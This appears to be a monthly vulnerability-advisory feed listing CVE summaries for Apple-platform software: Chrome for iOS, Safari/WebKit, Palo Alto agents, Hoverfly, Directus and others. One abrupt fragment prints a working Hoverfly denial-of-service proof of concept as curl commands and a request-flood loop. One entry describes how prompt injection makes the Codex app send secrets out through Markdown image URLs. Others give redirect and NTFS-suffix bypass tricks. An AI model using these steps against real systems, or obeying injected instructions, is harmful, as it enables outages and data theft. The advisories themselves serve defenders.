Apple
Monthly
Local credential theft in the garminconnect Python library (versions <= 0.3.4) stems from writing its OAuth token store to disk without an explicit file mode, so under the default umask 022 the file garmin_tokens.json - containing the DI refresh token - is created world-readable (0o644). Any unprivileged co-tenant on a shared Linux or macOS host can read the token and exchange it at Garmin's OAuth endpoint for fresh access tokens, gaining persistent access to the victim's Garmin Connect account. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the fix in 0.3.5 is confirmed and the issue is trivially reproducible under default configuration.
Server-side request forgery in Directus before 12.0.0 lets an authenticated user with file-upload rights abuse the /files/import endpoint to make the server fetch internal-only services and return their responses as downloadable files. The flaw stems from an incomplete SSRF denylist in api/src/request/is-denied-ip.ts, which treated 0.0.0.0 as a keyword but never blocked the literal address, so on Linux and macOS a request to 0.0.0.0 resolves to localhost and bypasses the protection. No public exploit identified at time of analysis and it is not in CISA KEV; EPSS was not provided.
{ "actionName": "leak", "remote": "http://192.0.2.1:9999/blackhole", "delayInMs": 0 }' ``` **Step 3: Load a catch-all simulation** ```bash curl -X PUT http://localhost:8888/api/v2/simulation \ -H "Content-Type: application/json" \ -d '{ "data": { "pairs": [{ "request": {"path": [{"matcher": "glob", "value": "*"}]}, "response": {"status": 200, "body": "ok", "postServeAction": "leak"} }], "globalActions": {"delays": [], "delaysLogNormal": []} }, "meta": {"schemaVersion": "v5.2"} }' ``` **Step 4: Flood with requests** ```bash for i in $(seq 1 10000); do curl -s -x http://localhost:8500 "http://target.com/req${i}" & [ $((i % 100)) -eq 0 ] && wait done ``` **Verified memory impact on Hoverfly v1.12.7:** ``` Memory before: 20,064 KB Memory after 50 requests: 23,376 KB Memory increase: 3,312 KB (66 KB per goroutine) ``` At this rate: - 1,000 requests = ~64 MB leaked - 10,000 requests = ~640 MB leaked - 100,000 requests = ~6.4 GB leaked → OOM crash An attacker with access to the admin API (unauthenticated by default) can cause a complete denial of service by: 1. Registering a remote post-serve action pointing to a non-responsive endpoint. 2. Loading a catch-all simulation that triggers the action on every request. 3. Sending proxy traffic, each request permanently leaks a goroutine and its associated memory.
Denial of service in Hoverfly's Diff mode (versions ≤ 1.12.7) lets any client with proxy access crash the entire process by sending concurrent requests. The `AddDiff()` function writes to the shared `responsesDiff` map without a mutex, so simultaneous proxy requests - the normal case for a proxy - trigger Go's built-in concurrent-map detector, producing an unrecoverable `fatal error: concurrent map read and map write` that kills the process. Publicly available exploit code exists (a working POC is embedded in the GitHub advisory), though there is no public exploit identified as actively used in the wild and no KEV listing.
Privilege elevation in Microsoft 365 Copilot for iOS lets a remote, unauthenticated attacker gain elevated access after a targeted user is lured into interacting with attacker-controlled content, per Microsoft's MSRC advisory. The flaw stems from improper access control (CWE-284) and carries a High CVSS 3.1 base score of 8.1 with high confidentiality and integrity impact but no availability impact. No public exploit has been identified at time of analysis and it is not listed in CISA KEV, but a vendor patch is available.
Spoofing in the Microsoft Bing Search app for iOS lets a remote attacker present deceptive or overlaid UI content that misleads the victim, because the app improperly restricts how rendered UI layers or frames are displayed (CWE-1021, a UI-redressing/clickjacking class of flaw). An unauthenticated attacker who lures a user into interacting with attacker-controlled content can manipulate what the user sees and trusts, potentially inducing them to act on falsified information. Microsoft has released a fix; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Authentication bypass by spoofing in the Elixir ueberauth_apple strategy (0.1.0 through 0.6.1) allows full account takeover because the callback id_token's signature is checked against Apple's JWKS but its registered claims are never validated. Remote unauthenticated attackers who obtain any Apple-signed token carrying the victim's sub - an expired token or one issued to a sibling client in the same Apple developer team - can replay it to log in as the victim. No public exploit identified at time of analysis, but the vendor-confirmed fix (0.6.2) and a clear replay path make this a high-priority auth flaw; EPSS and KEV data were not provided.
PDF save functionality in Firefox for iOS allows maliciously crafted page titles to manipulate the output file path, enabling overwrites of existing PDF files or bundled application content within the Firefox iOS sandbox. All versions prior to 152.4 on Apple iOS devices are affected. An attacker operating a malicious website can lure a user into saving a page as PDF, causing the crafted title to resolve to an unintended file path within the app sandbox - potentially corrupting application state or stored documents. No public exploit has been identified at time of analysis, though SSVC classifies the vulnerability as automatable with partial technical impact.
Local privilege escalation in Lima (lima-vm) before 2.1.3 lets any unprivileged user inside a guest VM reach root when the instance runs the QEMU driver with the guest agent enabled. Because the world-reachable /run/lima-guestagent.sock exposes address tunneling - including Unix sockets for privileged daemons such as D-Bus - an in-guest attacker can proxy to root-owned services and execute arbitrary commands as root. No public exploit identified at time of analysis, and it is not listed in CISA KEV.
Open redirect bypass in openrun prior to v0.17.7 allows remote unauthenticated attackers to redirect victims to arbitrary external URLs by exploiting a double-slash path prefix that evades the application's host/scheme validation. The referrer-based redirect logic correctly validates the host and scheme but passes the extracted path `//attacker.com` to the Location header, which browsers interpret as a protocol-relative URL and resolve to an external destination. A proof-of-concept is publicly documented in the security advisory; no active exploitation has been confirmed by CISA KEV at time of analysis.
Privilege escalation in Palo Alto Networks Prisma® Browser on macOS enables a locally authenticated administrator with access to the local filesystem to perform actions at root privilege level. The vulnerability is scoped exclusively to macOS deployments of Prisma Browser - no other platforms or Palo Alto products are implicated per the advisory. No public exploit identified at time of analysis; the CVSS 4.0 base score of 2.0 reflects the substantial exploitation prerequisites that materially constrain real-world risk despite the full-system impact potential at root level.
Improper certificate validation in the Palo Alto Networks Prisma Access Agent for iOS exposes VPN tunnel traffic to interception and manipulation by a network-adjacent attacker. The flaw (CWE-295) enables a man-in-the-middle position to defeat the agent's TLS/certificate trust chain, allowing an adversary to read or alter traffic that the iOS client believes is securely tunneled. Exploitation is limited to iOS deployments - the Windows, macOS, Linux, Android, and ChromeOS agents are confirmed unaffected. No public exploit code exists and the vulnerability is not listed in the CISA KEV catalog.
Multiple protection mechanism failures in the Data Loss Prevention (DLP) component of Palo Alto Networks Prisma Access Agent for Windows enable a local authenticated user to bypass DLP policy enforcement controls. Only the Windows platform is affected; the Prisma Access Agent for macOS is explicitly excluded per vendor advisory. No public exploit code or active exploitation has been identified at time of analysis, though the CVSS 4.0 supplemental urgency rating of Amber and high confidentiality/integrity impact on the vulnerable system make this a meaningful insider threat risk.
Unauthenticated remote code execution in Joro ≤ v1.1.0 (BishopFox's offensive-security tooling) allows an attacker to gain a shell as the operator's user when that operator merely visits a malicious web page. In the default proxy mode, Joro exposes an unauthenticated local API on 127.0.0.1:9090 with a wildcard CORS policy; because plugin uploads use the CORS-safelisted multipart/form-data content type, cross-origin JavaScript can upload a native Go plugin and trigger a restart through the operator's browser with no preflight or credentials, and the plugin's init() executes on load. No public exploit is identified at time of analysis, but the advisory documents a complete, reproducible attack chain, and the assigned CVSS is 9.6 (Critical).
Setuptools prior to 83.0.0 fails to normalize Unicode filenames before matching them against MANIFEST.in exclusion patterns on macOS APFS and HFS+ filesystems, allowing files with NFD-normalized on-disk names to silently bypass NFC-encoded exclude, global-exclude, recursive-exclude, and prune directives and be packed into Python source distributions. Python package maintainers developing on macOS face a supply chain risk: sensitive files such as credentials, private keys, or environment configs that are correctly listed in MANIFEST.in for exclusion may still appear in tarballs published to PyPI or private registries. No public exploit has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog.
Pre-account-hijacking in the better-auth Node/TypeScript authentication library (versions < 1.6.11 on the stable line and all current `next` pre-releases) lets an unauthenticated attacker seize a victim's account by pre-registering the victim's email via `/sign-up/email`, then having the victim's later OAuth/SSO sign-in implicitly linked to the attacker's row. The result is a single account the attacker controls with a working password login plus the victim's OAuth identity, and the link-time verification flip defeats `requireEmailVerification: true`. No public exploit identified at time of analysis; not listed in CISA KEV, though the flaw is the same class as Microsoft nOAuth (2023) and the Sign in with Apple JWT flaw (2020).
Address bar spoofing in Firefox for iOS allows a remote unauthenticated attacker to display a trusted origin in the browser's address bar while the victim views and interacts with fully attacker-controlled content - a classic and effective phishing enabler. The attack exploits a race condition in navigation handling: a malicious page enqueues a synchronous JavaScript dialog at the moment a user navigates away, freezing the address bar on the destination's legitimate origin while the malicious page's content continues to render. No public exploit code has been identified and EPSS is 0.15% (4th percentile), indicating no observed widespread exploitation; however, the technique is conceptually simple and phishing value is high.
Remote image auto-fetch in the OpenAI Codex desktop app for macOS (versions prior to 26.527.31326) enables silent exfiltration of session secrets via indirect prompt injection. An attacker who can place malicious instructions into content processed by Codex - such as a tool result, API response, or file read during a session - can manipulate the model into generating a Markdown image tag whose URL encodes sensitive data; the app then automatically fetches that URL, transmitting API keys, source code, or tool-returned data to an attacker-controlled server with no additional user action. No active exploitation is confirmed (not listed in CISA KEV), no public proof-of-concept is identified, and EPSS sits at 0.16% (6th percentile), indicating low current exploitation probability despite the high-value target profile of affected users.
OS command injection in create-react-app's react-dev-utils component enables remote code execution on macOS developer workstations running version 5.0.1 or earlier. The vulnerability resides in the startBrowserProcess function of openBrowser.js, which processes unsanitized input that reaches a shell invocation. A publicly available proof-of-concept exploit exists via the project's GitHub issue tracker; no vendor patch has been released and the maintainers have not responded to disclosure, leaving the entire supported version history of this widely-used but now-archived tool permanently unpatched.
Source-code disclosure in the Algernon web/application server (Go, xyproto/algernon, tested at v1.17.8) lets an unauthenticated remote client retrieve the raw source of any public-path server-side script on Windows hosts by appending an NTFS-equivalent suffix (::$DATA, a trailing dot, or a trailing space) to the URL. Because filepath.Ext() does an exact suffix match, these forms are not recognized as .lua/.tl/.po2/.amber/.frm and fall through to the raw-file branch, while NTFS canonicalizes the name back to the real script, exposing embedded database credentials and the SetCookieSecret value used to forge session cookies. Publicly available exploit code exists (full PoC in the GitHub advisory); no public exploit identified as actively exploited and this is not in CISA KEV.
SQL injection in the iNET Webkit WordPress plugin (version 1.2.4 and prior) lets authenticated users holding at least the Contributor role inject arbitrary SQL through unsanitized input, exposing the WordPress database. Reported by Patchstack and carrying a CVSS 8.5 (scope-changed) rating, it enables read access to sensitive data such as user credentials and secrets. No public exploit identified at time of analysis, and it is not listed in CISA KEV.
Local privilege escalation in Cato Client on macOS allows an authenticated low-privileged user to gain root by chaining two flaws in the PrivilegedHelperTool XPC service: improper certificate validation (CWE-295) that accepts self-signed certificates to bypass XPC caller verification, and a TOCTOU race condition exploitable via symlink swap during package installation. All Cato Client (SDP Client) versions prior to 5.13.1 on macOS are affected. A proof-of-concept exists per the CVSS 4.0 supplemental metric E:P, and the AU:Y (Automatable) tag indicates the exploit chain can be scripted - elevating practical urgency despite the absence of a CISA KEV listing.
Incorrect security UI in Passwords in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)
UI spoofing in Google Chrome for iOS prior to 150.0.7871.47 allows a remote attacker to manipulate browser interface elements via a crafted HTML page, provided the attacker can lure the victim into performing specific UI gestures. The root cause is insufficient validation of untrusted HTML input (CWE-20) within Chrome's iOS-specific rendering layer, resulting in low-integrity and low-availability impact. No public exploit code has been identified at time of analysis, and this vulnerability has not been added to the CISA KEV catalog; Chromium's own severity classification is Low.
Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)
Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low)
Omnibox (URL bar) spoofing in Google Chrome for iOS prior to 150.0.7871.47 allows a remote attacker to display a fraudulent URL in the browser's address bar by delivering a crafted HTML page. The root cause is classified as CWE-451 (UI Misrepresentation of Critical Information), meaning the security UI fails to accurately reflect the true origin of displayed content - a condition that directly undermines phishing defenses. No public exploit code has been identified at time of analysis, and the EPSS score of 0.18% (8th percentile) indicates very low observed exploitation pressure, consistent with the Chromium team's own 'Low' severity rating.
Use after free in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low)
No-referrer policy bypass in Google Chrome for iOS prior to 150.0.7871.47 allows a remote attacker to capture referrer URL information that the browser was supposed to suppress. Exploitation requires user interaction - the victim must visit a crafted HTML page served by the attacker - and exploits a client-side enforcement gap (CWE-602) specific to the iOS build of Chrome. EPSS is 0.19% (9th percentile) and no active exploitation or KEV listing exists, consistent with the Low Chromium severity rating.
Side-channel information leakage in the WebAuthentication component of Google Chrome on iOS (prior to 150.0.7871.47) exposes cross-origin data to remote attackers via a crafted HTML page, requiring only that a victim visit attacker-controlled content. The CVSS Confidentiality:High rating reflects the category of cross-origin data exposure, while Chromium's own internal severity classification of Low and an EPSS score of 0.21% (11th percentile) both signal that practical exploitation is considered unlikely at scale. No public exploit is identified at time of analysis and no CISA KEV listing exists.
Universal Cross-Site Scripting (UXSS) in Chrome's Omnibox on iOS enables remote attackers to inject arbitrary scripts or HTML across security origins by luring users into performing specific UI gestures on a crafted page. Affected versions are Chrome for iOS prior to 150.0.7871.47; the desktop channel is not affected. No public exploit code or active exploitation has been identified at time of analysis, and EPSS sits at 0.18% (8th percentile), consistent with Chromium's own 'Low' severity rating despite the scope-changed CVSS vector.
Use after free in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Low)
Navigation restriction bypass in Google Chrome for iOS prior to 150.0.7871.47 allows a remote, unauthenticated attacker to circumvent browser-enforced navigation controls by delivering a crafted HTML page. The flaw is confined to the iOS platform - Chrome on Android, Windows, macOS, and Linux is unaffected - and requires the victim to actively visit the attacker-controlled page (UI:R). With a CVSS score of 4.3 (Medium), an EPSS of 0.19% (9th percentile), no CISA KEV listing, and a Chromium-internal severity rating of Low, this vulnerability carries minimal real-world exploitation risk but warrants patching given its zero-privilege attack vector.
UI spoofing in Google Chrome for iOS prior to 150.0.7871.47 allows a remote attacker to misrepresent security indicators to users who are socially engineered into performing specific UI gestures on a crafted HTML page. The root cause is incorrect rendering of security UI elements (CWE-451), classified by the Chromium team as Low severity. No public exploit code exists and the vulnerability is not listed in the CISA KEV catalog, aligning with the modest CVSS 4.2 score and the high-complexity attack requirements.
Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)
Omnibox (URL bar) spoofing in Google Chrome for iOS prior to 150.0.7871.47 enables a remote attacker to display falsified URL content to a victim user via a crafted HTML page. Exploitation requires convincing the target to perform specific UI gestures while visiting the malicious page, making this a phishing-enabler rather than a direct code-execution primitive. No public exploit code and no active exploitation (CISA KEV) have been identified at time of analysis; Google has released a fix in the 150.0.7871.47 stable channel update.
UI spoofing in Google Chrome for iOS prior to version 150.0.7871.47 enables a remote attacker to misrepresent page identity or security state through a specially crafted HTML page, exploiting an inappropriate implementation classified under CWE-451. The vulnerability affects only the iOS-specific Chrome codebase - not Chrome on other platforms - and requires user interaction (visiting an attacker-controlled page). No public exploit code has been identified and EPSS sits at 0.21% (11th percentile), indicating low observed exploitation probability; it is not listed in the CISA KEV catalog.
Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)
Cross-origin data leakage in Google Chrome on iOS (prior to 150.0.7871.47) stems from an inappropriate implementation in the ScriptInjections subsystem, exploitable by a remote attacker who can lure a victim to a crafted HTML page. The flaw allows the attacker's origin to read data belonging to a different, protected origin - a fundamental violation of the Same-Origin Policy on Apple's iOS platform. No public exploit code has been identified at time of analysis, EPSS places exploitation probability at 0.22% (13th percentile), and SSVC signals no observed active exploitation, making this a medium-priority patch item despite its cross-origin impact.
Use after free in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)
Navigation restriction bypass in Google Chrome for iOS (prior to 150.0.7871.47) allows a remote attacker to subvert browser-enforced navigation controls by luring a user into performing specific UI gestures on a crafted HTML page. Classified as CWE-20 (Improper Input Validation), the flaw undermines integrity by permitting unauthorized navigation that the browser is intended to block. No public exploit code exists and EPSS sits at 0.22% (13th percentile), indicating low observed exploitation probability; the vulnerability is not listed in CISA KEV.
UI spoofing in Google Chrome for iOS prior to version 150.0.7871.47 allows a remote attacker to misrepresent browser interface elements - such as the address bar or origin indicators - by serving a crafted HTML page, potentially deceiving users into trusting malicious content. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) confirms network-reachable exploitation with no privilege requirement but mandatory user interaction, limiting impact to partial integrity loss with no confidentiality or availability effect. No public exploit or active exploitation has been identified; an EPSS score of 0.21% at the 11th percentile indicates very low current exploitation probability, and this vulnerability does not appear in the CISA KEV catalog.
Heap corruption in Google Chrome for iOS before 150.0.7871.47 lets a remote attacker who lures a user through specific in-page UI gestures on a crafted HTML page trigger a use-after-free (CWE-416), potentially leading to arbitrary code execution in the renderer. Rated Medium by the Chromium security team but scored CVSS 8.8 due to full confidentiality/integrity/availability impact; there is no public exploit identified at time of analysis and it is not listed in CISA KEV. EPSS is low at 0.21% (11th percentile), consistent with a freshly patched browser bug that has no known weaponization.
Cross-origin data leakage in Google Chrome's Autofill subsystem on iOS (versions prior to 150.0.7871.47) enables remote attackers to read sensitive data across origin boundaries by luring victims into performing specific UI gestures on a crafted page. Rooted in CWE-346 (Origin Validation Error), the Autofill policy enforcement layer fails to maintain proper origin isolation under targeted interaction conditions. With an EPSS of 0.21% (11th percentile) and no CISA KEV listing, no public exploit identified at time of analysis, though the CVSS-rated High confidentiality impact warrants prompt patching given Chrome's broad iOS deployment footprint.
UI spoofing in Google Chrome's Safe Browsing component on iOS enables remote attackers to mislead users through a crafted HTML page, potentially causing them to dismiss or misinterpret security warnings. Only Chrome for iOS versions prior to 150.0.7871.47 are affected; the desktop channel is not impacted by this specific flaw. No public exploit code exists and exploitation probability is very low (EPSS 0.21%, 11th percentile), though the network-accessible, zero-authentication attack surface keeps it relevant where phishing-style delivery is feasible.
Navigation restriction bypass in Google Chrome's Omnibox on iOS (prior to 150.0.7871.47) enables a remote attacker to circumvent address bar security controls through insufficient input validation, contingent on user interaction with specific UI gestures during exposure to malicious network traffic. The integrity impact is rated High (I:H) with no confidentiality or availability impact, consistent with a content/navigation spoofing class of vulnerability. No public exploit code or CISA KEV listing has been identified; EPSS score of 0.20% (10th percentile) indicates low observed exploitation probability at time of analysis.
UI spoofing in Google Chrome's iOSWeb component on iOS allows remote attackers to misrepresent interface elements to users running versions prior to 150.0.7871.47. The vulnerability, rooted in an inappropriate implementation (CWE-451), is triggered when a user performs specific UI gestures on a crafted HTML page, enabling spoofing of security-critical browser interface elements such as the address bar or permission dialogs. No public exploit or active exploitation (CISA KEV) has been identified at time of analysis; the high attack complexity and mandatory user interaction meaningfully constrain real-world risk.
Race condition exploitation in Google Chrome for iOS (prior to 150.0.7871.47) exposes potentially sensitive data from process memory to a local attacker with physical device access. The flaw is rooted in improper synchronization (CWE-362) and requires high attack complexity to successfully win the timing window. No public exploit has been identified and the vulnerability is not listed in CISA KEV; the vendor has released a patching fix in the 150.0.7871.47 stable channel update.
Navigation restriction bypass in Google Chrome's Safe Browsing implementation on iOS allows a remote, unauthenticated attacker to circumvent phishing and malicious-site protections via a specially crafted HTML page, affecting all Chrome for iOS versions prior to 150.0.7871.47. The flaw is classified as CWE-693 (Protection Mechanism Failure), meaning the Safe Browsing guard can be rendered ineffective rather than defeated through cryptographic or authentication means. No public exploit or CISA KEV listing has been identified, and the EPSS score of 0.23% (14th percentile) signals low current exploitation probability - but the zero-prerequisite network delivery and high integrity impact make this a meaningful risk for iOS users who have not updated.
UI spoofing in Google Chrome for iOS prior to version 150.0.7871.47 enables remote attackers to misrepresent browser interface elements - such as address bars or security indicators - by delivering a crafted HTML page to a victim on an iOS device. Rooted in CWE-451 (UI Misrepresentation of Critical Information), the flaw exploits an inappropriate implementation specific to Chrome's iOS code path, which differs from desktop Chrome due to WKWebView constraints imposed by Apple. No public exploit code exists, CISA SSVC rates exploitation as none, and EPSS sits at the 12th percentile, indicating minimal real-world threat at time of analysis.
Cross-origin data leakage in Google Chrome for iOS prior to 150.0.7871.47 exposes sensitive information from other origins when a remote attacker convinces a victim to perform specific UI gestures on a crafted HTML page. The flaw stems from an inappropriate implementation in the iOS-specific Chrome browser layer, classified under CWE-451 (UI Misrepresentation), and enables confidentiality compromise without requiring attacker privileges. No public exploit code has been identified at time of analysis, and EPSS at 0.22% (12th percentile) signals low near-term automated exploitation risk.
Side-channel information leakage in WebAuthentication within Google Chrome on iOS (versions prior to 150.0.7871.47) enables a remote attacker to infer cross-origin data by directing a victim to a crafted HTML page. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) confirms network-exploitable impact with high confidentiality loss, constrained by mandatory user interaction and scoped exclusively to the iOS platform. No public exploit identified at time of analysis; EPSS at 0.25% (16th percentile) signals low near-term exploitation probability, and no CISA KEV listing is present.
Insufficient policy enforcement in Web Authentication (Passkeys & Security Keys) in Google Chrome on iOS prior to 150.0.7871.47 allowed an attacker in a privileged network position to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)
Sandboxed arbitrary code execution in Google Chrome for iOS before 150.0.7871.47 lets an attacker who convinces a user to open a malicious file run code inside the browser's sandbox due to insufficient validation of untrusted input. Google rates the Chromium severity High and ships the fix in 150.0.7871.47; EPSS is low (0.15%, 4th percentile) and there is no public exploit identified at time of analysis. The flaw requires user interaction (opening the file) and, per the description, the resulting execution is confined to the sandbox rather than the underlying OS.
Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)
Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Omnibox spoofing in Google Chrome for iOS prior to 150.0.7871.47 enables remote unauthenticated attackers to display a falsified URL in the browser address bar by delivering a crafted HTML page to an iOS user. The flaw is classified CWE-451 (UI misrepresentation of critical information) and is iOS-platform-specific, with no impact on Chrome for Android, Windows, macOS, or Linux. No active exploitation is confirmed - the vulnerability is not listed in CISA KEV and EPSS sits at 0.22% (12th percentile) - but the spoofing primitive is a classic enabler of targeted phishing campaigns against mobile users.
Sandbox escape in Google Chrome for iOS prior to 150.0.7871.47 lets a remote attacker who has already compromised the renderer process break out of the sandbox via a crafted HTML page, escalating from renderer-level code execution to broader access on the device. The flaw stems from insufficient policy enforcement (CWE-20) and carries a High Chromium severity rating with a CVSS 8.3 (scope-changed) score. There is no public exploit identified at time of analysis and it is not in CISA KEV; EPSS probability is low at 0.21% (11th percentile).
Universal Cross-Site Scripting (UXSS) in Google Chrome for iOS prior to 150.0.7871.47 enables a remote attacker to inject arbitrary scripts or HTML across origins by exploiting insufficient input validation triggered through specific user UI gestures on a crafted page. The scope change (S:C in CVSS) is the critical dimension here - successful exploitation bypasses the same-origin policy, potentially granting the attacker script execution in the context of arbitrary origins within the browser session. No public exploit code has been identified and EPSS sits at just 0.20% (11th percentile), indicating low observed exploitation activity despite the high-impact class of vulnerability.
Side-channel information leakage in Safe Browsing in Google Chrome on iOS prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)
Sensitive process memory exposure in Google Chrome for iOS prior to 150.0.7871.47 enables a physically present attacker to read potentially sensitive data from the browser's memory without authentication. The root cause is insufficient data validation (CWE-20) within the iOS-specific Chrome implementation. No public exploit code or CISA KEV listing has been identified at time of analysis, and the physical access requirement (CVSS AV:P) significantly constrains real-world attacker opportunity.
Remote code execution in Google Chrome on iOS prior to 150.0.7871.47 stems from a use-after-free in the browser's Import component, allowing a remote attacker who lures a victim into opening a malicious file and performing specific UI gestures to execute arbitrary code. Rated High by Chromium and CVSS 7.5, the flaw has no public exploit identified at time of analysis and a low EPSS of 0.24% (15th percentile), consistent with its high attack complexity and required user interaction. A vendor patch is available in the June 2026 Stable channel update.
Navigation restriction bypass in Google Chrome for iOS (prior to 150.0.7871.47) permits a remote, unauthenticated attacker to circumvent client-side policy controls by delivering a crafted HTML page to a victim user. The flaw originates from insufficient policy enforcement (CWE-602), where navigation security logic enforced within the browser client can be subverted through malicious web content. No active exploitation has been identified - CISA KEV is not listed, SSVC confirms Exploitation: none, and the EPSS score of 0.22% (13th percentile) reflects minimal real-world exploitation activity at time of analysis.
Heap corruption in the iOSWeb component of Google Chrome for iOS before 150.0.7871.47 lets a remote attacker who lures a victim to a crafted HTML page potentially achieve memory corruption with high confidentiality, integrity, and availability impact. Chromium rated the underlying issue Critical severity, though the CVSS base score is 8.8 because exploitation requires user interaction (visiting a page). There is no public exploit identified at time of analysis, it is not on CISA KEV, and the EPSS probability is low at 0.21%.
Cross-origin information disclosure in Apple Safari, iOS, iPadOS, and macOS Tahoe (all versions before 26.5.2) allows an attacker who can direct a user to maliciously crafted web content to read sensitive data from other origins, violating the Same-Origin Policy. The flaw stems from inadequate tracking of security origins in the WebKit engine (CWE-346), and is notable because on iOS and iPadOS all browsers are mandated to use WebKit, meaning every browser on those platforms is affected. No public exploit or CISA KEV listing is identified at time of analysis; Apple has released patches across all affected platforms.
Memory corruption (CWE-119) in Apple Safari's web content processing engine causes an unexpected application crash when rendering maliciously crafted web content. Affected across Safari, iOS 26, iPadOS 26, and macOS Tahoe - all versions prior to 26.5.2. An unauthenticated remote attacker can trigger a denial-of-service against any user who visits a hostile page, though no code execution is indicated by current data. No public exploit code and no CISA KEV listing are identified at time of analysis; exploitation probability (EPSS) was not provided in source data.
Use-after-free memory corruption in Safari's web content rendering engine causes a denial-of-service crash on Apple platforms running Safari, iOS/iPadOS, and macOS Tahoe prior to version 26.5.2. An attacker who can lure a victim to visit a maliciously crafted webpage can reliably crash the Safari browser, with no code execution or data exfiltration indicated by the available CVSS impact scores (C:N/I:N). No public exploit code and no CISA KEV listing have been identified at time of analysis, placing this in the category of a significant but non-critical browser crash vulnerability.
Kernel memory corruption in Apple iOS/iPadOS (before 26.5.2) and macOS Tahoe (before 26.5.2) allows a malicious or compromised app to corrupt kernel memory or trigger unexpected system termination via malformed input that bypasses validation. Reported by Apple internally and fixed with improved input validation; no public exploit identified at time of analysis and the issue is not listed in CISA KEV. Despite a high CVSS of 9.1, the practical attack surface is bound to code already executing on the device as an app.
Clipboard data disclosure in Apple Safari (and the shared WebKit engine on iOS, iPadOS, and macOS) before version 26.5.2 lets a malicious website silently read or hijack clipboard contents without user interaction or permission, rated CVSS 7.5 (confidentiality-only). Apple has shipped fixes in Safari 26.5.2, iOS/iPadOS 26.5.2, and macOS Tahoe 26.5.2, and the issue was reported internally by Apple. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV.
Processing maliciously crafted web content in Apple Safari, iOS/iPadOS, and macOS Tahoe (all versions prior to 26.5.2) triggers an improper memory handling flaw (CWE-119 buffer overflow) in the web content processing pipeline, resulting in an unexpected process crash. The attack vector is network-based requiring user interaction (UI:R per CVSS), and impact is confined to availability - no confidentiality or integrity compromise is described. No public exploit code has been identified at time of analysis, and this vulnerability does not appear in the CISA KEV catalog.
Use-after-free memory corruption in Safari's web content rendering engine causes an unexpected application crash when processing maliciously crafted web content. Affected are Apple Safari, iOS and iPadOS, and macOS Tahoe - all prior to version 26.5.2. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) confirms that a remote unauthenticated attacker can trigger this condition simply by luring a user to visit a hostile page, with impact limited to availability (process crash/DoS). No public exploit code identified and not listed in CISA KEV at time of analysis; vendor-released patches are available.
Safari, iOS/iPadOS, and macOS Tahoe expose process memory when the browser engine processes maliciously crafted web content, rooted in a CWE-119 improper memory buffer restriction (tagged Buffer Overflow). The CVSS vector (AV:N/AC:L/PR:N/UI:R/C:H) indicates a network-reachable, low-complexity attack requiring only that the victim visit or render attacker-controlled content, resulting in high confidentiality impact through memory leakage. No active exploitation has been confirmed in CISA KEV and no public proof-of-concept has been identified at the time of analysis; Apple has released patched versions (26.5.2) across all affected platforms.
Sandbox escape in Apple's WebKit/Safari web content engine allows a malicious website to process restricted web content outside the sandbox on Safari, iOS/iPadOS, and macOS prior to 26.5.2. Reported by Apple and classed as an improper access-control flaw (CWE-284), it requires a victim to load attacker-controlled content (UI:R) and carries CVSS 7.1 with a scope change, reflecting that breaking out of the sandbox crosses a security boundary. There is no public exploit identified at time of analysis and EPSS is low (0.16%), though CISA's SSVC framework rates the technique as automatable with partial technical impact.
Memory corruption in Apple's WebKit-based web content processing allows an unauthenticated remote attacker to crash the affected process by luring a user to visit a maliciously crafted webpage. Affected platforms include Safari, iOS, iPadOS, and macOS Tahoe, all prior to version 26.5.2. No public exploit code has been identified at time of analysis, and this CVE does not appear in the CISA KEV catalog; impact is limited to availability (process crash) with no confirmed confidentiality or integrity exposure.
Use-after-free memory corruption in Apple's WebKit browser engine causes an unexpected process crash when rendering maliciously crafted web content. Safari (all versions prior to 26.5.2), iOS and iPadOS (all versions prior to 26.5.2), and macOS Tahoe (all versions prior to 26.5.2) are affected across Apple's full consumer device ecosystem. No public exploit or CISA KEV listing exists at time of analysis; impact is confirmed as denial-of-service (process crash) only, with no confidentiality or integrity compromise.
Double free memory corruption in Apple's web content processing engine crashes the rendering process on iOS/iPadOS (pre-26.5.2) and macOS Tahoe (pre-26.5.2) when a device processes attacker-controlled web content. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) confirms network delivery with no authentication required, though a user must interact with the malicious content, and impact is limited to availability - no confidentiality or integrity compromise is indicated. No public exploit code and no CISA KEV listing exist at time of analysis, placing this in a lower active-risk tier despite the ubiquity of affected Apple platforms.
